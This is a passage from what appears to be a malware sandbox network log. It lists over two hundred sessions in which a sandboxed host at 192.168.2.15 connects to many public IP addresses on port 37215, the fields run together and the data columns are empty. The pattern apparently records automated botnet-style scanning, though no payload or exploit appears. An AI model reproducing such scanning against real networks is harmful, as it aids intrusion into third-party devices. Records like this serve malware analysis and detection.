                                              18174192.168.2.155458637.214.244.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18175192.168.2.1555196222.25.140.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18176192.168.2.1551886121.56.126.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18177192.168.2.155130431.102.90.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18178192.168.2.1557026122.251.4.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18179192.168.2.154536437.133.158.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18180192.168.2.1560266122.40.15.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18181192.168.2.1545278181.35.143.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18182192.168.2.1533644190.15.23.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18183192.168.2.1560304197.157.104.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18184192.168.2.1542716181.29.8.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18185192.168.2.1535756181.230.132.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18186192.168.2.1546158122.115.200.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18187192.168.2.1535080186.20.186.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18188192.168.2.154126841.230.177.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18189192.168.2.155528231.112.81.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18190192.168.2.155424645.73.164.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18191192.168.2.1542598138.62.153.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192192.168.2.153637857.8.125.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18193192.168.2.154950037.85.172.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18194192.168.2.1558752176.204.225.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18195192.168.2.1542364102.160.127.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18196192.168.2.154443237.49.148.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18197192.168.2.155469494.66.52.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18198192.168.2.1541746157.247.182.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18199192.168.2.155214294.15.188.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18200192.168.2.1556938181.224.65.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18201192.168.2.155560894.31.110.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18202192.168.2.153802694.220.183.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18203192.168.2.1553218181.179.111.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18204192.168.2.1547014157.22.209.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18205192.168.2.1559840157.236.149.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18206192.168.2.155616845.203.105.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18207192.168.2.1538860156.252.170.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18208192.168.2.1554220181.8.4.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18209192.168.2.153301837.6.96.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18210192.168.2.1548912197.16.57.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18211192.168.2.153452437.168.72.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18212192.168.2.1557744102.117.148.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18213192.168.2.1559672190.15.38.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18214192.168.2.155317841.206.95.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18215192.168.2.1544214186.226.83.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18216192.168.2.1543248138.114.137.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18217192.168.2.154094845.35.231.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18218192.168.2.155530445.91.25.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18219192.168.2.1547566222.208.13.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18220192.168.2.154025251.248.94.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18221192.168.2.153288045.235.207.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18222192.168.2.154007631.68.92.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18223192.168.2.1550646222.240.246.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18224192.168.2.1533070197.95.77.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18225192.168.2.154549041.17.127.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18226192.168.2.1541030138.107.104.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18227192.168.2.155330241.106.21.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18228192.168.2.1547058122.145.43.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18229192.168.2.1542680156.125.17.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18230192.168.2.1547068186.100.118.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18231192.168.2.1557064190.46.147.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18232192.168.2.155774431.84.58.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18233192.168.2.1553910157.173.31.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18234192.168.2.1553454190.208.181.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18235192.168.2.154077037.254.17.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18236192.168.2.155033431.249.150.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18237192.168.2.154399037.71.27.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18238192.168.2.155416437.233.155.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18239192.168.2.153607037.182.150.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18240192.168.2.1533052190.182.27.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18241192.168.2.155857031.167.208.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18242192.168.2.1537266222.42.167.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18243192.168.2.154508441.153.45.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18244192.168.2.1542116122.219.52.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18245192.168.2.1550316186.226.12.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18246192.168.2.1534664102.238.137.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18247192.168.2.1544006102.62.81.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18248192.168.2.155155237.228.24.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18249192.168.2.1555718181.65.26.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18250192.168.2.1538002181.109.76.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18251192.168.2.153515041.57.118.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18252192.168.2.1557158222.233.153.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18253192.168.2.154194031.147.89.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18254192.168.2.1557364186.215.185.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18255192.168.2.155342437.42.17.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18256192.168.2.1546356121.208.20.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18257192.168.2.1552624102.136.202.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18258192.168.2.1557472138.235.86.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18259192.168.2.1544724222.166.190.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18260192.168.2.1541622181.247.68.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18261192.168.2.1541138122.64.230.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18262192.168.2.1536034190.130.155.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18263192.168.2.1546430156.197.13.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18264192.168.2.1547698190.40.182.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18265192.168.2.1545160121.236.222.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18266192.168.2.1549316181.235.193.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18267192.168.2.1539780197.30.68.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18268192.168.2.1545692181.52.144.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18269192.168.2.1545318157.138.211.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18270192.168.2.1547016121.144.191.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18271192.168.2.1534054157.64.126.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18272192.168.2.1559952121.70.111.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18273192.168.2.1542494193.97.98.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18274192.168.2.1555044190.60.206.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18275192.168.2.1556374156.39.133.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18276192.168.2.1550622186.255.233.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18277192.168.2.1543656181.6.130.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18278192.168.2.1539918190.215.175.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18279192.168.2.1554224116.36.255.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18280192.168.2.1557044138.159.25.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18281192.168.2.1535198156.8.28.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18282192.168.2.156018845.16.247.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18283192.168.2.1539592181.165.3.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18284192.168.2.1552028122.187.154.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18285192.168.2.1544780156.49.233.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18286192.168.2.155848245.76.219.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18287192.168.2.155159645.16.34.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18288192.168.2.155005845.20.96.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18289192.168.2.1539378181.130.68.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18290192.168.2.1556796190.181.132.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18291192.168.2.1542322186.71.40.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18292192.168.2.1558422138.195.254.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18293192.168.2.1557684138.173.94.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18294192.168.2.1548280156.87.157.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18295192.168.2.153593245.243.254.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18296192.168.2.1533604197.146.152.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18297192.168.2.1538414156.136.74.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18298192.168.2.154903645.52.112.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18299192.168.2.1557908122.65.168.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18300192.168.2.153416694.246.200.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18301192.168.2.155761094.177.116.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18302192.168.2.1545582186.3.123.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18303192.168.2.154937894.60.197.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18304192.168.2.153437894.165.254.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18305192.168.2.1560364168.99.18.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18306192.168.2.1558720182.113.199.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18307192.168.2.1560194186.146.242.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18308192.168.2.1535622122.94.31.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18309192.168.2.1552134157.82.218.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18310192.168.2.154497494.71.65.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18311192.168.2.1550592138.143.231.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18312192.168.2.153547631.196.92.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18313192.168.2.1547716222.67.210.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18314192.168.2.1548420138.243.243.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18315192.168.2.1545968190.97.220.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18316192.168.2.1538724121.25.85.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18317192.168.2.1549882186.116.35.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18318192.168.2.155905831.172.28.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18319192.168.2.154781894.243.38.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18320192.168.2.1551766197.172.254.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18321192.168.2.153817031.97.199.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18322192.168.2.153570838.218.14.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18323192.168.2.153757445.236.111.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18324192.168.2.153776637.105.242.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18325192.168.2.1559810181.204.214.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18326192.168.2.153363894.254.200.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18327192.168.2.1551250181.196.91.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18328192.168.2.1547450156.31.41.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18329192.168.2.1536274156.169.133.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18330192.168.2.1536898222.52.26.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18331192.168.2.1549710157.51.223.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18332192.168.2.1534474181.137.245.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18333192.168.2.1549884186.34.36.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18334192.168.2.1552462156.206.132.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18335192.168.2.1542380121.219.69.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18336192.168.2.153781845.123.102.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18337192.168.2.154076894.67.16.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18338192.168.2.154139245.88.163.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18339192.168.2.1540484138.36.228.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18340192.168.2.1537774102.69.2.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18341192.168.2.1535430102.225.91.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18342192.168.2.155135831.8.233.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18343192.168.2.153808094.145.61.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18344192.168.2.154025437.128.86.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18345192.168.2.1539394190.26.118.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18346192.168.2.155719041.235.192.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18347192.168.2.1546314197.174.1.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18348192.168.2.1553976181.198.248.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18349192.168.2.1537538157.246.82.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18350192.168.2.1551666102.234.164.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18351192.168.2.1555824122.172.84.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18352192.168.2.153958445.232.106.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18353192.168.2.1545636197.88.151.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18354192.168.2.1542310181.244.148.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18355192.168.2.1538720190.138.17.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18356192.168.2.1546160222.24.89.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18357192.168.2.1550234157.209.72.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18358192.168.2.1549972122.87.70.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18359192.168.2.1548772190.88.102.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18360192.168.2.1544086181.94.117.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18361192.168.2.1553844197.221.251.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18362192.168.2.1533076190.17.123.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18363192.168.2.153747031.128.166.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18364192.168.2.1539910186.193.223.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18365192.168.2.1538080156.17.114.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18366192.168.2.1540478102.69.179.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18367192.168.2.155118878.64.27.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18368192.168.2.1553430138.111.22.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18369192.168.2.1545446181.241.134.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18370192.168.2.153342431.192.137.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18371192.168.2.1554434190.71.43.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18372192.168.2.1539226197.147.117.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18373192.168.2.1537570156.119.183.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18374192.168.2.154282037.62.45.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18375192.168.2.1553178181.203.38.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18376192.168.2.156028031.37.98.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18377192.168.2.1546512157.22.177.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18378192.168.2.153630031.213.58.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18379192.168.2.1555950157.183.234.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18380192.168.2.155994245.52.217.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18381192.168.2.153981245.91.1.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18382192.168.2.1536190222.186.181.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18383192.168.2.1537234121.12.96.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18384192.168.2.1537736197.208.139.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18385192.168.2.153664437.232.43.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18386192.168.2.1542168156.67.111.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18387192.168.2.1556498102.99.14.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18388192.168.2.1546610121.146.247.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18389192.168.2.1543230122.25.214.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18390192.168.2.1533648122.75.98.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18391192.168.2.155666463.218.162.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18392192.168.2.1534782197.44.159.22737215
